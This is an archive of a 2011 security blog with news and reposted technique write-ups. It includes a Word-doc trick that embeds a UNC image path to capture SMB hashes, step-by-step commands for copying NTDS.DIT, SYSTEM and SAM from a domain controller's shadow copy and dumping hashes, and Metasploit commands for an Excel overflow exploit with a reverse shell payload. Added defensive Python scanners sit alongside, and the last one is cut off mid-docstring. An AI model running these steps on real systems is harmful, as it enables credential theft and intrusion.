Wednesday, November 30, 2011

Embedding A Link To A Network Share In A Word Doc

Taken from the Carnal0wnage blog, this is an excellent method to embed a network share in a Word document.

snip snip .......

Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...

In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.

I ended up adding the following code to the office document (replace "[" and "]" with "<" and ">"):

[html][body][img src="\\\share\pwn.jpeg" width=1 height=1][/body][/html]

Once that is done go to Insert --> Object --> Text from File --> select your HTML file.

Once that is done, save and open the document. If all is well you'll see the SMB requests to the network share you specified, and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods... I do realize the LM hashes are missing from the smb capture screenie (disabled on Windows 7?) but I was too lazy to install Office on a VM just for the screenshot.

If this doesn't work for anyone let me know.
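As an added, defender-side example (not code from the Carnal0wnage post), here is a Python scanner that flags HTML img sources and Word .docx relationship targets pointing at a UNC/SMB path, which is exactly what the snippet above relies on. The host name and the sample HTML and relationship XML are constructed.

```python
"""Flag document image references that would make a reader's machine open an SMB
connection. Added example, not code from the Carnal0wnage post; the host name and
the sample HTML / .docx relationship XML below are constructed."""
import re
import zipfile
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# OOXML relationship namespace: a linked (not embedded) picture in a .docx lives in
# word/_rels/document.xml.rels as a Relationship with TargetMode="External".
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
DRIVE_RE = re.compile(r"^[A-Za-z]:$")


def is_unc_reference(target: str) -> bool:
    """True if fetching this target would contact a remote host over SMB.

    Covers bare UNC paths (\\\\host\\share\\x) and file: URLs that name a host
    (file://host/share/x, file:///\\\\host\\share\\x). file:///C:/... is local.
    """
    t = target.strip()
    if not t.lower().startswith("file:"):
        # In HTML, "//cdn.example/x" is protocol-relative HTTP, so only backslashes count.
        return t.startswith("\\\\")
    rest = t[5:].replace("\\", "/")
    stripped = rest.lstrip("/")
    leading = len(rest) - len(stripped)
    host = stripped.split("/", 1)[0]
    # Exactly three slashes (file:///C:/...) is the local-drive form; two, or four and
    # more (file:///\\host\share), put a host name first.
    if leading < 2 or leading == 3 or not host:
        return False
    return host.lower() != "localhost" and not DRIVE_RE.match(host)


class _ImgSrcCollector(HTMLParser):
    """Collect every <img src=...> value in a document."""

    def __init__(self) -> None:
        super().__init__()
        self.sources: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def find_unc_images_in_html(html_text: str) -> list[str]:
    """Return <img> sources in HTML that point at a UNC/SMB location."""
    collector = _ImgSrcCollector()
    collector.feed(html_text)
    return [s for s in collector.sources if is_unc_reference(s)]


def find_unc_targets_in_rels(rels_xml) -> list[str]:
    """Return external relationship targets in a .rels part that point at UNC/SMB."""
    root = ET.fromstring(rels_xml)
    return [
        rel.get("Target", "")
        for rel in root.iter("{%s}Relationship" % REL_NS)
        if rel.get("TargetMode") == "External" and is_unc_reference(rel.get("Target", ""))
    ]


def scan_docx(path: str) -> list[str]:
    """Walk every .rels part inside a .docx (a zip) and collect UNC/SMB targets."""
    hits: list[str] = []
    with zipfile.ZipFile(path) as doc:
        for name in doc.namelist():
            if name.endswith(".rels"):
                hits.extend(find_unc_targets_in_rels(doc.read(name)))
    return hits


# Constructed samples: the 1x1 image trick from the post, next to a harmless HTTPS image.
SAMPLE_HTML = (
    '<html><body><img src="\\\\fileserver.example.test\\share\\pwn.jpeg" width=1 height=1>'
    '<img src="https://cdn.example.test/logo.png"></body></html>'
)
SAMPLE_RELS = (
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
    'relationships/image" Target="media/image1.png"/>'
    '<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
    'relationships/image" Target="file:///\\\\fileserver.example.test\\share\\pwn.jpeg" '
    'TargetMode="External"/>'
    "</Relationships>"
) % REL_NS

if __name__ == "__main__":
    print("HTML hits:", find_unc_images_in_html(SAMPLE_HTML))
    print("docx rels hits:", find_unc_targets_in_rels(SAMPLE_RELS))
```

Run scan_docx() over incoming attachments to catch the linked-picture variant; an embedded picture shows up as a plain media/imageN relationship and is not flagged.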

Session Hijacking - SSL Session Sidejacking (SSLStrip, Hamster, Ferret)

Mutillidae 2.1.7 Deliberately Vulnerable Web App Updated (a lot)

Jeremy Druin has been doing a lot of work on Mutillidae. Here is the change log since the last time I mentioned it:

Change Log for Mutillidae 2.1.7:

Added a new page for HTML5 storage. The page is meant to show how to both use and attack HTML5 storage. The page supports Local and Session storage types. The user can attack the storage in two contexts. They can act as if they want to read the contents of their own browser's session storage to see if the developer put authorization tokens or other items into the storage. They can also try to use XSS to steal the session storage. In this use-case the user would be acting as if they wanted to read someone else's storage. A large number of hints have been added to the page. The page name is "html5-storage.php" and it can be accessed from the Cross Site Scripting menu and the information leakage menu. In security level zero, the page has no defenses. In level 1, the page uses trivial JavaScript validation. In security level 5, the page refuses to put the secrets in client side storage.

11/13/2011: Jeremy Druin / Kenny Kurtz

Change Log for Mutillidae 2.1.6:

Enhanced the .htaccess file to automatically disable magic quotes on systems which enable them by default (such as some OSX versions of PHP)
Fixed some bugs in the phpinfo.php file that made the page display weird.
Enhanced the hidden PHPINFO page so that it would work if the user browsed to http://localhost/mutillidae/index.php?page=phpinfo.php or to http://localhost/mutillidae/phpinfo.php. This example assumes Mutillidae is running on localhost.
Fixed a bug in index.php that kept the log-visit page from being included.
Fixed a bug in log-visit.php that kept the page from working.
Fixed installation instructions format for IE 8 not in compatibility mode.

11/10/2011: Jeremy Druin

Change Log for Mutillidae 2.1.5:

Added vuln to login sequence. Now a cookie is created with username. Students should try to XSS the cookie and see what happens. Also try a response splitting attack because a cookie is an HTTP header.
Created new twitter feed to make Mutillidae announcements and other web vulnerability tweaks. @webpwnized
Fixed installation instructions format for IE 8 not in compatibility mode

10/14/2011: Jeremy Druin

Change Log for Mutillidae 2.1.4:

Moved usage instructions and php errors from the home page to their own pages.
In insecure mode, changed the method of the user-info.php page to GET in order to make it easier to use sqlmap against Mutillidae. sqlmap supports POST but it is easier to use with GET.
Added hints about sqlmap to sql injection tutorial and to the easter egg file
Added a credit card table as a target in the database
Confirmed that the view-blog table can be attacked with sqlmap. The answer is in the Easter Egg file.

10/13/2011: Jeremy Druin

Change Log for Mutillidae 2.1.3:

Fixed a bug. If the user was on the home page without having clicked any link to this point (such as when using a bookmark), and then clicked "change security level", the page would redirect to page not found.
Increased the slide time for the ddsmoothmenu to make it slow down a little bit
Added a NEW vulnerability. Many sites have crazy pages that show server settings, expose admin functionality, allow configuration, or other features a user should not be able to see. The problem is not the pages themselves so much as the fact that developers think no one will guess the name and browse to them. Shoulder surfing, guessing, brute-forcing, etc can be used to find these pages. Mutillidae now has such a page. It is in the "Server Misconfiguration" category. See secret-administrative-pages.php for hints.
Augmented the installation instructions
Added link to ihackcharities to front page
Added a new security level. Now there is security level 1. The only difference in this release between level 0 and level 1 is that level 1 has JS validation. The JS validation has been in place for a while but was active in level 0. Since level 0 is supposed to be very easy, the decision was made to create level 1 and move JS validation to level 1. The JS validation is trivial to bypass. Simply disable JS or use a proxy such as Tamper Data, Paros, Burp, WebScarab, or others.
Page homenotes.php has been merged with home.php.
Page home.html has been renamed home.php
Added protection for SQL injection to the add-to-your-blog.php output of the current user's blog entries. Prior to this patch, you could SQL inject in security level 5 by putting your injection in the current user's login name, because the query uses the current user's login name as its input.
Improved the DNS lookup page to add JS validation in security level 1 mode.
Changed padding for BACK button to use styles rather than HTML BR tags.
Changed the password generator password length to 15 to set a better example.
Some refactoring on user-info.php and login.php to clean up code
Added CSRF protection to the add-to-your-blog page. This only works in secure mode.
Added more scripts to the easter egg file (Mutillidae Test Scripts)
Bug fix: The setupandreset.php errors were not printing out.
Stupid bug fix: Removed the "open DB" that was firing before the database was actually created.
Created output on page setupandreset.php to show what happened
Added try/catch and more error handling to setupandreset.php

Wednesday, November 23, 2011

Top 10 iPhone Security Tips

This paper offers guidelines on securing your iPhone using features provided by iOS and by following other security best practices. It begins by discussing basic security settings for novice users and then continues to discuss advanced techniques for expert users. This paper is intended for users who want to take proactive measures to secure their iPhones, companies willing to train their employees (before allowing corporate email on the devices), and administrators working on developing strong policies. It confines its discussion to iPhone security features only and does not discuss similar features that may be available in other mobile device platforms such as Android. However, some of the concepts and standards apply across all these devices.

Download PDF here.

Tuesday, November 22, 2011

Dumping hashes from live DCs...

LaNMaSteR53 (Tim Tomes) presented VSSOwn at Hack3rCon II, and picking up from there, this technique was pushed further to dump hashes off a live DC. The actual blog entry from PaulDotCom is here. It goes like this:

The basis of the talk and the purpose for Mark's research is that there are some really cool things you can do with Volume Shadow Copies in modern Windows Operating Systems. Our talk takes the approach of using Shadow Copies for hiding malware on Windows systems, but Mark mentions during the talk how one can access protected system files through Shadow Copies as well.

The day after we first presented "Lurking in the Shadows" at Hack3rCon II, Matt Graeber (@mattifestation) reached out to me and asked if I'd ever tried to take the SAM, SYSTEM hive or NTDS.DIT files from a live system using this technique. At the time, I hadn't. So, I immediately fired up my Windows 7 box, created a Shadow Copy with VSSOwn, and attempted to copy the SAM and SYSTEM hive files directly from the Shadow Copy. To my surprise, the 2 files copied without any non-readable errors! I guess I knew it would be possible, as Mark and I were already beating around this bush, but this meant something bigger. Something huge. Was it now possible to dump the NTDS.DIT and SYSTEM hive files from a LIVE domain controller for offline hash dumping? I quickly promoted one of my 2008 Servers to a DC, psexec'd a meterpreter shell to it and took a shot at the NTDS.DIT file with VSSOwn. The file copied out of the Shadow Copy without issue.

So it appears that Mark and I have uncovered some interesting stuff here. You can access anything that is supposed to be locked down and protected on a Windows system by accessing them through Shadow Copies. I can only imagine how we are going to begin seeing this used in the wild and I'm interested to see what others come up with.

But wait a sec. I still don't have hashes. All I have is the SYSTEM hive and the NTDS.DIT file. What can we do with these? Well, up until recently, nothing for free. No one had built a free, open source tool for parsing NTDS.DIT files and decrypting the hashes. But during my quest to find something, Jeremy Pommerening tweeted a link to this white paper. In brief, a security researcher named Csaba Barta took some existing tools and modified them to parse through the NTDS.DIT file and extract the hashes from it. Awesome! The link is complete! I combined Mark and my technique with Csaba's tools and here is the result:

1. Create a new Shadow Copy.
cscript vssown.vbs /start (optional)
cscript vssown.vbs /create

2. Pull the following files from a shadow copy:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

3. Copy files to BT5R1.

2. Download tools from:

3. Configure and Make the source code for libesedb from the extracted package.
cd libesedb
chmod +x configure
./configure && make

4. Use esedbdumphash to extract the datatable from ntds.dit.
cd esedbtools
./esedbdumphash ../../ntds.dit

5a. Use to dump the hashes from the datatable using the bootkey from the SYSTEM hive.
cd ../../creddump/
python ./ ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable

5b. Use bkhive and samdump2 to dump the hashes from the SAM file using the bootkey from the SYSTEM hive.
bkhive SYSTEM key.txt
samdump2 SAM key.txt

6. Crack the hashes.

Beautiful right? But we're not done yet. Csaba also created a tool called which dumps the PAST hashes of all the users as well. Now you can crack the historical passwords of users and identify patterns in their password history.

python ./ ../system ../libesedb/esedbtools/ntds.dit.export/datatable

So what exactly does this mean? No more dangerous LSASS injection to dump domain hashes and no more drive mounting to access locked and protected system files. This is just plain awesome! Huge props to Csaba Barta for the tools and kick ass white paper, Matt Graeber for the idea (and everything else it seems like recently), and dakykilla for providing the files I needed to test all this stuff. You guys rock!
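As an added, defender-side example (not part of the PaulDotCom post), the following Python correlates shadow copy creation with copies of ntds.dit, SYSTEM or SAM through the HarddiskVolumeShadowCopy device path used in the steps above. It runs over constructed command-line audit records in a simplified key=value format; the hosts, users and timestamps are made up.

```python
"""Detect the 'shadow copy, then copy ntds.dit/SYSTEM/SAM' sequence from command-line
audit records. Added example, not from the PaulDotCom post; the log format, host names,
users and timestamps below are constructed."""
import re
from datetime import datetime, timedelta

# Shadow copy creation from the command line: the vssown.vbs script used in the post,
# plus the built-in vssadmin and WMI routes (assumption: these are the patterns to watch).
SHADOW_CREATE_RE = re.compile(
    r"vssown\.vbs\s+/create|vssadmin(?:\.exe)?\s+create\s+shadow|shadowcopy\s+call\s+create",
    re.I,
)
# A read through the raw shadow copy device path shown in the post.
SHADOW_DEVICE_RE = re.compile(r"HarddiskVolumeShadowCopy\d+", re.I)
# The three files the technique targets.
PROTECTED_FILE_RE = re.compile(
    r"\\(?:ntds\\ntds\.dit|system32\\config\\(?:SYSTEM|SAM))(?:\s|$)", re.I
)
# Constructed record format: <ISO timestamp> host=<name> user=<domain\user> cmd="<command line>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd="(?P<cmd>.*)"$'
)


def parse_line(line: str):
    """Parse one audit record into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return rec


def detect_shadow_copy_credential_access(lines, window=timedelta(minutes=30)):
    """Return alerts for copies of ntds.dit/SYSTEM/SAM out of a shadow copy device path.

    Severity is "high" when the same host created a shadow copy within `window`
    beforehand, otherwise "medium": the copy alone is still worth a look, since backup
    software does not normally read those files through the GLOBALROOT device path
    from an interactive shell.
    """
    records = [r for r in map(parse_line, lines) if r]
    records.sort(key=lambda r: r["ts"])
    last_create = {}  # host -> time of the most recent shadow copy creation
    alerts = []
    for r in records:
        cmd = r["cmd"]
        if SHADOW_CREATE_RE.search(cmd):
            last_create[r["host"]] = r["ts"]
            continue
        if SHADOW_DEVICE_RE.search(cmd) and PROTECTED_FILE_RE.search(cmd):
            created = last_create.get(r["host"])
            recent = created is not None and r["ts"] - created <= window
            alerts.append({
                "host": r["host"],
                "user": r["user"],
                "ts": r["ts"].isoformat(),
                "severity": "high" if recent else "medium",
                "cmd": cmd,
            })
    return alerts


# Constructed sample: DC01 shows the full sequence, WS07 reads an ordinary user file
# from a shadow copy (benign), DC02 copies SAM with no creation event in view.
SAMPLE_LOG = r"""
2011-11-22T10:00:05Z host=DC01 user=CORP\svc-backup cmd="cscript vssown.vbs /create"
2011-11-22T10:00:41Z host=DC01 user=CORP\svc-backup cmd="copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\ntds\ntds.dit ."
2011-11-22T10:00:47Z host=DC01 user=CORP\svc-backup cmd="copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\system32\config\SYSTEM ."
2011-11-22T11:30:00Z host=WS07 user=CORP\alice cmd="copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\alice\report.docx ."
2011-11-22T12:00:00Z host=DC02 user=CORP\bob cmd="copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\system32\config\SAM ."
"""

if __name__ == "__main__":
    for alert in detect_shadow_copy_credential_access(SAMPLE_LOG.splitlines()):
        print(alert["severity"].upper(), alert["host"], alert["user"], alert["cmd"])
```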

Hackers attack a US water utility

Hackers destroyed a pump used by a US water utility after gaining unauthorized access to the industrial control system it used to operate its machinery. Five computer screenshots posted early Friday purport to show the user interface used to monitor and control equipment at the Water and Sewer Department for the City of South Houston, Texas.

''This is arguably the first case where we have had a hack of critical infrastructure from outside the United States that caused damage,'' a managing partner at Applied Control Solutions, Joseph Weiss, said.

The network breach was exposed after cyber intruders burned out a pump. ''No one realised the hackers were in there until they started turning on and off the pump,'' he said.

The report said hackers apparently broke into a software company's database and retrieved usernames and passwords of various control systems that run water plant computer equipment. Using that data, they were able to hack into the Illinois plant.

The U.S. Department of Homeland Security and the Federal Bureau of Investigation are examining the matter, said DHS spokesman Peter Boogaard.

"At this time there is no credible corroborated data that indicates a risk to critical infrastructure entities or a threat to public safety," he said, declining to elaborate further. An FBI spokesman in Illinois did not return phone calls seeking comment.

Is it hard to crack full Disk Encryption For Law Enforcement ?

If you'd rather keep your data private, take heart: disk encryption is a lot harder to break than techno-thriller movies and TV shows make it out to be, to the chagrin of some branches of law enforcement. MrSeb writes with word of a paper titled "The growing impact of full disk encryption on digital forensics", co-authored by a member of US-CERT, that illustrates just how difficult it is.

The abstract of the paper is available here, and a short summary is written below:
The increasing use of full disk encryption (FDE) can significantly hamper digital investigations, potentially preventing access to all digital evidence in a case. The practice of shutting down an evidential computer is not an acceptable technique when dealing with FDE or even volume encryption because it may result in all data on the device being rendered inaccessible for forensic examination. To address this challenge, there is a pressing need for more effective on-scene capabilities to detect and preserve encryption prior to pulling the plug. In addition, to give digital investigators the best chance of obtaining decrypted data in the field, prosecutors need to prepare search warrants with FDE in mind. This paper describes how FDE has hampered past investigations, and how circumventing FDE has benefited certain cases. This paper goes on to provide guidance for gathering items at the crime scene that may be useful for accessing encrypted data, and for performing on-scene forensic acquisitions of live computer systems. These measures increase the chances of acquiring digital evidence in an unencrypted state or capturing an encryption key or passphrase. Some implications for drafting and executing search warrants to dealing with FDE are discussed.

The paper does go on to suggest some ways to ameliorate these issues: better awareness at the evidence-gathering stage would help, and it also suggests "on-scene forensic acquisition" of data (which involves ripping unencrypted data from volatile, live memory, presumably with the cryogenic RAM freezing technique). Ultimately, though, the researchers aren't hopeful: "Research is needed to develop new techniques and technology for breaking or bypassing full disk encryption," concludes the paper.

Thursday, November 17, 2011

Hotfix For SRP/AppLocker Bypass

Remember that Microsoft has features that bypass its own Software Restriction Policies and AppLocker, as described in Circumventing SRP and AppLocker, By Design and Circumventing SRP and AppLocker to Create a New Process, By Design.

Microsoft has issued a hotfix for this bypass: KB2532445

It is only for Windows 7 and Windows Server 2008 R2 though; it will not help you if you use SRP on Windows XP or Vista.

Tuesday, November 15, 2011

Uniscan 2.0 Released

Uniscan is an open source vulnerability scanner for web applications. Uniscan 2.0 is a Perl vulnerability scanner for RFI, LFI, RCE, XSS and SQL injection.
  • Identification of system pages through a Web Crawler.
  • Use of threads in the crawler.
  • Control of the maximum number of requests made by the crawler.
  • Control of variation of system pages identified by Web Crawler.
  • Control of file extensions that are ignored.
  • Test of pages found via the GET method.
  • Test the forms found via the POST method.
  • Support for SSL requests (HTTPS).
  • Proxy support.
  • Generate site list using Google.
  • Generate site list using Bing.
  • Plug-in support for Crawler.
  • Plug-in support for dynamic tests.
  • Plug-in support for static tests.
  • Plug-in support for stress tests.

Tutorials to create your plug-ins:

Thursday, November 10, 2011

Metasploit Changes to Git

Metasploit is changing from using their own SVN server to host their repository to GitHub, and by this move to Git as their tool for managing the main repository available to the public for getting access to the Framework source code. This also changes the way commits are done: if any non-Rapid7 employee or contractor member of the development team wants to contribute code, it will have to be through the GitHub pull request feature. This will allow Rapid7 better control over who commits and the quality of the commits, making sure that their commercial products Metasploit Community, Pro and Express do not get affected by a contribution that did not go through a proper test procedure and quality assurance. In addition, the shift from SVN to Git will allow the Rapid7 team greater flexibility to make modifications to the framework on forks and branches on their own systems, allowing them to keep the main repository as stable as possible and changes to be pushed in a less risky manner. This is a great business move since it will reduce risk and accelerate development of the base foundation of their products, allowing the team to focus more on the technical and engineering aspects of the projects and less on the overhead of managing code on their machines. In terms of management of community commits, the pull requests will centralize the process from Redmine and the emails to the msfdev mailing list, making it easier for them to get contributions for the Framework. I do have to say I will miss the ability to push my own changes and fixes and will have to rely, like everybody else, on the fork process and the GitHub pull request method, but in the long run this is a better solution for the stability of the code, faster innovation and risk reduction, allowing Rapid7 to further advance the Framework that is the base of some of their commercial products.

Now this does change my workflow for the code I write for use in Metasploit. I do have a GitHub account that I used as my temporary account for plugins and modules; I will be consolidating this into one single project in GitHub and making sure it follows the folder structure of the framework, so I can just have it on my machine under ~/.msf4. That way I can modify and test modules and plugins without the need to put them in the framework folder itself, and move them into the forked version if I wish to contribute them to Rapid7; if not, they will still be accessible for sharing under my GitHub page. So there are now two new ways to use the framework repository depending on your need. If you only want to consume the code in it and do not wish to contribute your code to Rapid7, you just need to have Git on your system and clone the repository. You first start by installing Git.

Installing Git

On OS X you only need to install the latest Xcode Tools from the App Store. On CentOS 6 and the latest Fedora systems you would run as root:

yum update

yum install git

On Ubuntu and Debian systems you would run as root:

apt-get update

apt-get install git-core

Cloning the Repository

I'm a person who likes having several copies of the Framework to work in; I tend to keep in my home folder on my boxes a folder called dev where I keep all the project repositories I use. So I recommend you start by creating the folder to host the project and its copies, in case you later decide to fork and work on coding inside the Framework.

mkdir -p ~/dev

cd ~/dev

Once the folder is created you only need to clone the Git repository that is on GitHub:

git clone git://

Now you should be able to use and work from inside the metasploit-framework folder created there. To keep your copy updated you only need to run from that folder:

git pull

This will fetch the latest changes and merge them together.

Monday, November 7, 2011

Hack3rcon II 2-2 Tim Tomes and Mark Baggett Lurking in the Shadows

This nice talk will discuss the history of concealing data within operating systems and new techniques and tools for doing so in modern Windows implementations.

MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to ZDI by Aniway

Vulnerability reported to vendor by ZDI the 2010-10-18

Coordinated release of the vulnerability the 2011-04-12

Metasploit PoC provided the 2011-11-05

PoC provided by :

juan vazquez

Reference(s) :

Affected version(s) :

Microsoft Office XP Service Pack 3

Microsoft Office 2003 Service Pack 3

Microsoft Office 2007 Service Pack 2

Microsoft Office 2010 (32 and 64 bits edition)

Microsoft Office 2004 for Mac

Microsoft Office 2008 for Mac

Microsoft Office for Mac 2011

Open XML File Format Converter for Mac

Microsoft Excel Viewer Service Pack 2

Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Office Excel 2007 (12.0.4518.014)

Description :

This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine and the number of bytes to copy, therefore causing a stack-based buffer overflow. This results in arbitrary code execution under the context of the user.

Commands :

use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp


Thursday, November 3, 2011

Lab Matters - Inside the Sony Hack

Tim Armstrong looks at the timeline of the Sony breach and pieces together the relevant details at each point in time. He discusses the known facts of the case and the potential future fallout.

13 Out Of 15 Popular CAPTCHA Schemes Vulnerable To Automated Attacks

Security researchers have discovered the vast majority of text-based anti-spam tests are easily defeated.

Computer scientists from Stanford University discovered 13 of 15 CAPTCHA schemes from popular websites were vulnerable to automated attacks. The CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) has been used for several years to prevent automated sign-ups to webmail accounts or online forums in order to block spam bots. Surfers are typically asked during a registration process to identify distorted letters as depicted in an image. A variety of other approaches – including pictures of cats, audio clips and calculus puzzles – have been applied to the problem over the years.

Cybercrooks have responded to the challenge posed by CAPTCHAs by devising techniques that typically involve semi-automatically signing up for new accounts, while relying on the human cogs in 21st century sweatshops – typically located in India – to solve the CAPTCHA puzzles themselves.

The Stanford team, by contrast, looked at whether it was possible to fully automate the process of breaking CAPTCHAs. Their techniques included removing deliberately introduced image background noise and breaking text strings into single characters for easier recognition. The team built an automated tool, called Decaptcha, that applied these various tricks. The approach was partially inspired by techniques used to orientate robots in unknown environments.

Decaptcha was turned against the challenge response CAPTCHAs used by 15 high-profile websites, enjoying excellent bowling figures against the majority.

For example, Visa’s payment gateway CAPTCHA was defeated 66 per cent of the time. eBay’s CAPTCHA was sidestepped 43 per cent of the time. Lower, but still workable, bypass rates were achieved against Wikipedia, Digg and CNN.

Google and reCAPTCHA were the only two CAPTCHA systems that consistently thwarted Decaptcha during the tests. and Digg have both switched to reCAPTCHA since these tests were run, Computerworld adds.

In a research paper (PDF), the Stanford team suggest several approaches towards making CAPTCHAs harder to beat, including making the length of a text string changeable and randomising character font and size. Lines in the background of CAPTCHAs might also prove effective. In addition, the Stanford team highlighted features that are ineffective against automated attacks but may counter the activities of humans.

The researchers, Elie Bursztein, Matthieu Martin and John C. Mitchell, who previously developed techniques for breaking audio CAPTCHAs, presented their latest research at the recent ACM Conference on Computer and Communications Security in Chicago.

Duqu: Questions and Answers

Due to its complexity, the Duqu case is challenging to understand. Here are some questions and answers that we hope will help.

Q: What is Duqu?
A: Because of the news and ongoing developments surrounding Duqu, that's actually a very broad question. Here's a narrow answer: Duqu is a Windows bot (not worm) that has been used as part of highly targeted attacks against a limited number of organizations, in a limited number of countries.

Q: How does Duqu spread?
A: Duqu doesn't spread on its own. In one known case, Duqu was installed by a document attachment which was delivered via an e-mail message.

Q: Isn't that the same method by which RSA was hacked?
A: Yes. Numerous targeted attacks have used this method. In the RSA case, an Excel document attachment used an embedded Flash object that exploited a zero-day vulnerability in Adobe Flash Player to install a backdoor/remote access tool (RAT) called Poison Ivy.

Q: So what's so special about Duqu's exploit?
A: The zero-day used by Duqu's installer exploits a vulnerability in the Windows kernel.

Q: How much more advanced is a Windows kernel exploit than a Flash Player exploit?
A: What? Please.

Q: No, seriously, how much?
A: Significantly more. A Windows kernel vulnerability/exploit is worth a great deal more compared to one used against a third-party application, even one so widely installed as Flash Player.

Q: Can I patch my system against this vulnerability?
A: No. You can't.

Q: So what can I do if this Windows kernel vulnerability is unpatched?
A: Wait. Microsoft Security Response is currently investigating the vulnerability and is preparing a solution. Fortunately, the exploit document is in very limited circulation, and is under an NDA.

Q: Why is there an NDA on the document?
A: Because it was such a highly targeted attack, the document itself would most likely reveal the identity of the target. Sharing the document would be a breach of customer confidentiality, and therefore CrySyS Lab (discoverer of Duqu) cannot release the document unless it is done in a way that protects the privacy of their customer.

Q: So Duqu's installer is not "in-the-wild"?
A: Not generally, no. Though there could be some other undiscovered variants.

Q: So is Duqu a threat to me?
A: That depends on who you are. But generally, no. However, Duqu will eventually create a big problem.

Q: What problem will Duqu create?
A: Once Microsoft patches the Windows kernel vulnerability, criminals at large will be able to reverse engineer the patch, and will discover the vulnerability. At that point, any Windows computer that isn't up to date will be more vulnerable to what could prove to be a very serious exploit.

Q: But not yet?
A: Correct.

Q: Is there anything else interesting about Duqu?
A: Yes, definitely. In one known case, a driver used by Duqu was signed using a stolen certificate issued to a Taiwanese hardware company called C-Media.

Q: Why did Duqu use a signed driver?
A: Signed drivers can circumvent security policies that prompt about or reject installation of unsigned drivers. Security policies can be configured to inherently distrust unsigned drivers. Having a driver signed by a known vendor provides a valuable level of trust.

Q: So then is that why Duqu such a big deal? Because of the zero-day and the signed driver?
A: That… and because Duqu is "related" to Stuxnet.

Q: How is it related?
A: A component of "Duqu" is nearly identical to a component of "Stuxnet" and they appear to have been authored by somebody that has access to common source code.

Q: What else relates "Duqu" and "Stuxnet"?
A: One of the drivers used by "Duqu" claims to be from a Taiwanese hardware company called JMicron. Stuxnet used drivers that were signed by a certificate stolen from JMicron.

Q: How were the certificates stolen?
A: Unknown.

Q: How many were stolen?
A: Known cases, three different hardware vendors from Taiwan: C-Media; JMicron; and Realtek.

Q: Why is "Duqu" connected to Taiwan?
A: Unknown.

Q: Why the quotes? What else is "Duqu"?
A: In a broad sense, Duqu is an "organized action" or a "mission" that has been deployed (or authorized) by a nation state.

Q: What do you mean by an "organized action"?
A: "Duqu" appears to be an espionage or reconnaissance mission of some sort. For example, in the real world, a reconnaissance mission of this sort could be considered what United States Marine Corps Force Reconnaissance (FORECON) teams call a "Green Operation".

Q: So "Duqu" isn't just malicious code?
A: The software component is only one part of what we call Duqu. Think about it like this: there's Duqu software and there's also Operation Duqu.

Q: And "Stuxnet"? What about the Stuxnet worm?
A: The installer used by Operation Stuxnet was an advanced USB worm. The worm used a zero-day Windows vulnerability to facilitate its spread.

Q: Are the missions of Operation Duqu and Operation Stuxnet the same?
A: No. Operation Stuxnet was more of a "Black Operation", a mission that involves direct action, which in Stuxnet's case, was to disrupt operations at an Iranian nuclear power facility.

Q: Stuxnet disrupted operations at a nuclear power plant?
A: Yes. Operation Stuxnet was very complex, and also, subtle. The Stuxnet worm and its additional components needed to travel a sizeable distance geographically. It also needed to infiltrate a closed target which was not connected to the Internet, on autopilot, without calling home.

Q: So that's why Stuxnet used a USB worm as the installer/infection vector?
A: Yes. Because of the difficult mitigating factors, Stuxnet needed to spread itself without any external resources. And so it was equipped with numerous zero-day exploits. Out of context, Stuxnet's infection capabilities seem to be overkill, but then, its mission appears to have been a success, so those behind Stuxnet probably don't think so.

Q: How does Duqu differ?
A: Duqu is advanced but is not configured to act autonomously. Once the installer infects its target, Duqu calls home to a command and control (C&C) server. There are two servers that are currently known. One was located in India and the other was located in Belgium. The IP addresses are now inactive.

Q: What actions were carried out by the C&C?
A: In one known case, Duqu downloaded an infostealer to collect data from the target. That infostealer is actually the component from which Duqu gets its name, because it prepends log files related to stolen data with "DQ".

Q: What else can the C&C do?
A: For example, Duqu could be instructed to spread itself on the target network via shared network resources.

Q: How did Duqu send the collected data to the C&C?
A: It encrypted the data and appended it to JPG images.

Q: What? JPG images? Why?
A: So that somebody monitoring network traffic would only see innocent looking image files instead of confidential materials.
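The exfiltration trick described in this answer (encrypted data appended to a JPG) leaves a simple artifact a defender can look for: bytes after the JPEG End-Of-Image marker. The following check is an added example and is not part of the original Q&A or any Duqu analysis; the segment walker, the entropy heuristic and the sample bytes are constructed for illustration and assume nothing about Duqu's real file layout beyond what the answer states.

```python
"""Flag JPEG files that carry data after the End-Of-Image (EOI) marker.

A well-formed JPEG ends with the two bytes FF D9. Anything after that is
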